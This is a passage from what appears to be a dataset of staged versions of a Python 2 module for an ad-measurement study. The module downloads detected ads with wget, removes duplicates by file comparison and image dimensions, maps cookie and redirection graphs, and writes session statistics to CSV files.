fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', 
'-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2:\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list\n\n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node\n for domain, dval in jsonData.items():\n domain_node = _check_node(domain)\n cookie_list = []\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie']\n parsed_cookie = None\n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath': domainPath, 'referrer':\n referrer, 'referrerPath': referrerPath, 'cookieList':\n parsed_cookie})\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. 
The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-4": "<mask token>\nLOG = logging.getLogger('logAdGrabber')\nADREGEX = AdRegEx()\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if 
check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\ndef write_run_info(RUNINFO_DIR, session_date):\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\n\ndef write_session_info(vmid, machineid, profile, session_date, train_mode,\n training_sites, test_sites, num_of_refresh, export_folder):\n train_category = training_sites.keys()[0]\n train_sites_to_visit = training_sites[train_category]\n with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:\n fwtr.write('session_str : %s\\n' % session_date)\n fwtr.write('machine_info : %s\\n' % machineid)\n fwtr.write('vmid : %s\\n' % vmid)\n fwtr.write('profile : %s\\n' % profile)\n fwtr.write('train_mode : %s\\n' % train_mode)\n fwtr.write('num_of_refresh : %d\\n' % num_of_refresh)\n fwtr.write('training_topic : %s\\n' % train_category)\n fwtr.write('training_sites : ')\n for site in train_sites_to_visit:\n fwtr.write('%s, ' % site)\n fwtr.write('\\nnum_of_train_sites : %d\\n' % len(train_sites_to_visit))\n fwtr.write('test_sites : ')\n for site in test_sites:\n fwtr.write('%s, ' % site[1])\n fwtr.write('\\nnum_of_test_sites : %d\\n' % len(test_sites))\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder,\n process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n totalads = 0\n totaluniqads = len(ads)\n totalad_category = {}\n uniqad_category = {}\n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w'\n ) as bugs_wtr:\n bugs_wtr.write(\n \"\"\"#Ad-UID, Website-URL, Refresh-Num, Training-Topic, Site-Context, BugCount, BugSrc\n\"\"\"\n )\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0\n uniq_ads = []\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, 
bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write(\n '{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.\n format(uuid, test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w'\n ) as ses_wtr:\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write(\n '#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(\n train_category, test_site, num_of_visit,\n totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information 
and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path, bug.\n get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path 
= task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\ndef build_nodes(jsonData):\n \"\"\"\n This function takes a JSON encoded output of the firefox addon and builds a\n call graph for the javascript/HTML redirections\n\n @rtype nodes: dict\n @return: A graph of redirection chains\n \"\"\"\n nodes = {}\n\n def _process_cookiestr(cookieStr):\n \"\"\"\n parses a dictionary of req/resp calls to extract the cookie information\n returns a list of cookies set on this domain\n \"\"\"\n cookie_list = []\n for cookie in cookieStr.split('\\n'):\n c = {}\n for cook in cookie.split(';'):\n token = cook.split('=', 1)\n if len(token) < 2:\n continue\n c[token[0]] = token[1]\n cookie_list.append(c)\n return cookie_list\n\n def _check_node(d):\n try:\n domain_node = nodes[d]\n except KeyError:\n isBug, bug_name, bug_type = ADREGEX.search(domain)\n domain_node = WebNode(domain, isBug, bug_name, bug_type)\n nodes[d] = domain_node\n return domain_node\n for domain, dval in jsonData.items():\n domain_node = _check_node(domain)\n cookie_list = []\n for info in dval:\n domainPath = info['domainPath']\n referrerPath = info['referrerPath']\n referrer = info['referrer']\n cookieBool = info['cookie']\n parsed_cookie = None\n if cookieBool:\n cookieStr = info['cookiestr']\n parsed_cookie = _process_cookiestr(cookieStr)\n cookie_list.append(parsed_cookie)\n domain_node.add_reqresp({'domainPath': domainPath, 'referrer':\n referrer, 'referrerPath': referrerPath, 'cookieList':\n parsed_cookie})\n referrer_node = _check_node(referrer)\n referrer_node.add_child(domain_node)\n domain_node.add_parent(referrer_node)\n domain_node.set_cookies(cookie_list)\n return nodes\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. 
The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-5": "from time import sleep\nfrom uuid import uuid1\nfrom pprint import pprint\nfrom shutil import copy2\nfrom multiprocessing import Process, Queue, Pool, Manager\nfrom ad_grabber_classes import *\nfrom adregex import *\nfrom pygraph.classes.digraph import digraph\n\nimport os\nimport json\nimport jsonpickle\nimport subprocess\nimport cPickle\nimport logging\nLOG = logging.getLogger(\"logAdGrabber\")\nADREGEX = AdRegEx()\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n # bin by dimensions\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count] \n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n #LOG.debug('did not manage to curl the scripts for bug:%s' % bug)\n error_bugs.append(bug)\n continue\n\n if bug.is_ad(): # give zerofucks to non-ads\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n # choose from the swf media bin\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump', '-X',\n bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump', '-Y',\n bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError :\n LOG.exception(\"swfdump error on file %s\" % bug_filepath)\n else:\n # choose from the 
img media bin\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output(['identify', '-format', '\"%h\"',\\\n bug_filepath]).strip()\n width = subprocess.check_output(['identify', '-format','\"%w\"',\\\n bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception(\"identify error on file %s\" % bug_filepath)\n\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n # check all the images in the bin with the dimensions\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.get_filepath()): \n dup = m\n break\n if dup:\n # check if the duplicate ad came from a different test site\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else :\n ads[dup] = {test_site : bug_count}\n # delete old bug reference, add new one and point to duplicated\n # bug\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n\n else: \n target_bin[dimension].append(bug)\n ads[bug] = {test_site : bug_count}\n # tally up the results\n except KeyError: # The bin hasn't been created\n target_bin[dimension] = [bug]\n ads[bug] = {test_site : bug_count}\n # else:\n # notads\n\n return ads,error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try :\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n # Relative location = Location of the ad within this current session\n # Global location, added when an ad is matched with existing ads in DB\n fwtr.write('#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n \n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(new_uuidname,\n name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\ndef write_run_info(RUNINFO_DIR, session_date):\n # write to a file in runinfo_dir to tell automation script this run is done\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\ndef write_session_info(vmid, machineid, profile, session_date, train_mode, training_sites,\n test_sites, num_of_refresh, export_folder):\n train_category = training_sites.keys()[0]\n train_sites_to_visit = training_sites[train_category]\n with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:\n fwtr.write('session_str : %s\\n' % session_date) \n fwtr.write('machine_info : %s\\n' % machineid)\n fwtr.write('vmid : %s\\n' % vmid)\n fwtr.write('profile : %s\\n' % profile)\n fwtr.write('train_mode : %s\\n' % train_mode)\n fwtr.write('num_of_refresh : %d\\n' % num_of_refresh)\n fwtr.write('training_topic : %s\\n' % train_category)\n fwtr.write('training_sites : ')\n for site in train_sites_to_visit:\n fwtr.write('%s, ' % site)\n fwtr.write('\\nnum_of_train_sites : %d\\n' % len(train_sites_to_visit))\n fwtr.write('test_sites : ')\n for site in test_sites: \n fwtr.write('%s, ' % site[1])\n fwtr.write('\\nnum_of_test_sites 
: %d\\n' % len(test_sites))\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder, process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n\n # to be read and inserted into db\n totalads = 0 # total number of ads seen during this session\n totaluniqads = len(ads) # does not support multicategories at this point\n\n # for each category, for each test site, count total number of ads seen\n totalad_category = {} \n # for each category, for each test site, count total number of uniq ads seen\n uniqad_category = {}\n \n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w') as bugs_wtr:\n bugs_wtr.write('#Ad-UID, Website-URL, Refresh-Num, Training-Topic,\\\n Site-Context, BugCount, BugSrc\\n')\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0 # for each site\n uniq_ads = [] # for each site\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(uuid, test_site,\n refresh_num, train_category, 'N/A', bugcount, bug.get_src()))\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads # global count for total ads\n\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w') as ses_wtr:\n # write some metadata information about this session\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write('#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n\n for train_category, cat_dict in results.items(): \n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(train_category,\n test_site, num_of_visit, totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results,out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... 
